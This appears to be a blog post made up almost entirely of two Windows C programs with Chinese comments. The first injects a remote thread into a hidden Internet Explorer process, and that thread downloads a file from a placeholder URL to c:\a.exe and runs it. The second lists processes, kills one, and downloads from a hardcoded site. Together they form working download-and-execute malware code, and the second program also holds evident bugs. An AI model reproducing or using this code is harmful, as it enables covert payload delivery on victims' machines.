#include "stdafx.h"
#pragma comment(lib, "urlmon.lib")
#include <tlhelp32.h>
#include <urlmon.h>
#include <shellapi.h>
typedef struct _RemotePara
{
char Url[255];
char FilePath[255];
DWORD DownAd;
DWORD ExecAd;
}RemotePara;
DWORD __stdcall ThreadProc(RemotePara *lpPara)
{
typedef UINT (__stdcall *MWinExec)(LPCSTR lpCmdLine, UINT uCmdShow);
typedef HRESULT (__stdcall *MURLDownloadToFile)(LPUNKNOWN pCaller, LPCTSTR szURL, LPCTSTR szFileName, DWORD dwReserved, LPBINDSTATUSCALLBACK lpfnCB);
MURLDownloadToFile myURLDownloadToFile;
myURLDownloadToFile=(MURLDownloadToFile)lpPara->DownAd;
myURLDownloadToFile(0,lpPara->Url,lpPara->FilePath,0,0);
MWinExec myWinExec;
myWinExec=(MWinExec)lpPara->ExecAd;
myWinExec(lpPara->FilePath,1);
return 0;
}
DWORD FindTarget(LPCTSTR lpszProcess);
void EnableDeBugPriv(void);
DWORD __stdcall ThreadProc(RemotePara *lpPara);
int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{
ShellExecute(NULL,"open", "iexplore.exe","","", SW_HIDE );
EnableDeBugPriv();
DWORD dwProcessId = FindTarget("iexplore.exe");
HANDLE hWnd=::OpenProcess(PROCESS_ALL_ACCESS,FALSE,dwProcessId);
if (!hWnd)
{
::MessageBox(NULL,"打开进程错误","错误",0);
return 0;
}
void *pRemoteThread= VirtualAllocEx(hWnd, 0,
1024*4, MEM_COMMIT|MEM_RESERVE,
PAGE_EXECUTE_READWRITE);
if (!pRemoteThread)
{
::MessageBox(NULL,"申请内存1错误","错误",0);
return 0;
}
if (!::WriteProcessMemory(hWnd,pRemoteThread,&ThreadProc,1024*4,0))
{
::MessageBox(NULL,"写入内存1错误","错误",0);
return 0;
}
RemotePara myRemotePara;
::ZeroMemory(&myRemotePara,sizeof(RemotePara));
HINSTANCE hurlmon=::LoadLibrary("urlmon.dll");
HINSTANCE kernel=::LoadLibrary("kernel32.dll");
myRemotePara.DownAd=(DWORD)::GetProcAddress(hurlmon,"URLDownloadToFileA");
myRemotePara.ExecAd=(DWORD)::GetProcAddress(kernel,"WinExec");
char urlfile[255];
strcpy(urlfile,"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA");
strcpy(myRemotePara.Url,urlfile);
strcpy(myRemotePara.FilePath,"c:\\a.exe");
RemotePara *pRemotePara=(RemotePara *)::VirtualAllocEx(hWnd,0,sizeof(RemotePara),MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);
if (!pRemotePara)
{
::MessageBox(NULL,"申请内存2错误","错误",0);
return 0;
}
if (!::WriteProcessMemory(hWnd,pRemotePara,&myRemotePara,sizeof(myRemotePara),0))
{
::MessageBox(NULL,"写入内存2错误","错误",0);
return 0;
}
Sleep(3000);
HANDLE hThread=::CreateRemoteThread(hWnd,0,0,(LPTHREAD_START_ROUTINE)pRemoteThread,pRemotePara,0,0);
if (!hThread)
{
::MessageBox(NULL,"启动线程错误","错误",0);
return 0;
}
return 0;
}
void EnableDeBugPriv(void)
{
HANDLE hToken;
LUID sedebugnameValue;
TOKEN_PRIVILEGES tkp;
if(!::OpenProcessToken(::GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY,&hToken))
return;
if(!::LookupPrivilegeValue(NULL,SE_DEBUG_NAME,&sedebugnameValue))
{
::CloseHandle(hToken);
return;
}
tkp.PrivilegeCount=1;
tkp.Privileges[0].Luid=sedebugnameValue;
tkp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;
if (!::AdjustTokenPrivileges(hToken,FALSE,&tkp,sizeof(tkp),NULL,NULL))
::CloseHandle(hToken);
}
DWORD FindTarget(LPCTSTR lpszProcess)
{
DWORD dwRet = 0;
HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
PROCESSENTRY32 pe32;
pe32.dwSize = sizeof(PROCESSENTRY32);
Process32First(hSnapshot,&pe32);
do{
if(lstrcmpi(pe32.szExeFile,lpszProcess) == 0){
dwRet = pe32.th32ProcessID;
break;
}
}while(Process32Next(hSnapshot,&pe32));
CloseHandle(hSnapshot);
return dwRet;
}
------------------------------------------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------------------------------------------
#include "stdio.h"
#include "windows.h"
#include "winbase.h"
#include "tlhelp32.h"
#pragma comment(lib,"kernel32.lib")
#pragma comment(lib,"advapi32.lib")
#pragma comment (lib, "urlmon.lib")
//提升本进程权限
void EnableDebugPriv( void )
{
HANDLE hToken;
TOKEN_PRIVILEGES tkp;OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken);
LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME,&tkp.Privileges[0].Luid);
tkp.PrivilegeCount = 1;
tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
AdjustTokenPrivileges(hToken, FALSE, &tkp, 0,(PTOKEN_PRIVILEGES)NULL, 0);
CloseHandle( hToken );
}
//文件下载
int DownloadFile(char *sURL)
{
HRESULT hr;
hr = URLDownloadToFile(0, sURL, "e:\a.jpg", 0, 0);
if(hr==S_OK)
return 0;
else
return 1;
}
//取得系统版本
int GetOsVer(void)
{
OSVERSIONINFO winfo;
winfo.dwOSVersionInfoSize=sizeof(OSVERSIONINFO);
GetVersionEx(&winfo);
if(winfo.dwPlatformId==VER_PLATFORM_WIN32_NT)
return 1;
else
return 0;
}
//根据进程ID杀进程
pskill(int id)
{
HANDLE hProcess=NULL;//打开目标进程
DWORD ret=TerminateProcess(hProcess,0);
hProcess=OpenProcess(PROCESS_TERMINATE,FALSE,id);
if (hProcess==NULL)
{
printf("\nOpen Process fAiled:%d\n",GetLastError());
return -1;
}
//结束目标进程
if(ret==0)
{
printf("%d",GetLastError());
}
return -1;
}
int main(void)
{
char *sURL="http://www.jxbiz.com/shop.asp";
int id=0;
//进程列举
HANDLE hSnApshot= CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
if (GetOsVer())
printf("Your system is winnt!\n");
else
printf("Your system is win98!\n");
if(hSnApshot!=INVALID_HANDLE_VALUE)
{
PROCESSENTRY32 te={sizeof(te)};
BOOL f0k = Process32First(hSnApshot,&te);
for(;f0k;f0k=Process32Next(hSnApshot,&te))
{
printf("Pid: %d %s\n",te.th32ProcessID ,te.szExeFile );
}
}
CloseHandle(hSnApshot);//杀进程
printf("the process's id which you want to kill:");
scanf("%d",&id);
EnableDebugPriv(); //提升权限
pskill(id); //下载文件
if (DownloadFile(sURL)==0)
printf("down successful!\n");
else
printf("error!\n");
//EnableDebugPriv();
//ExitWindowsEx(EWX_SHUTDOWN | EWX_FORCE, 0);
return 0;
}
Trackback: http://tb.blog.csdn.net/TrackBack.aspx?PostId=1643749
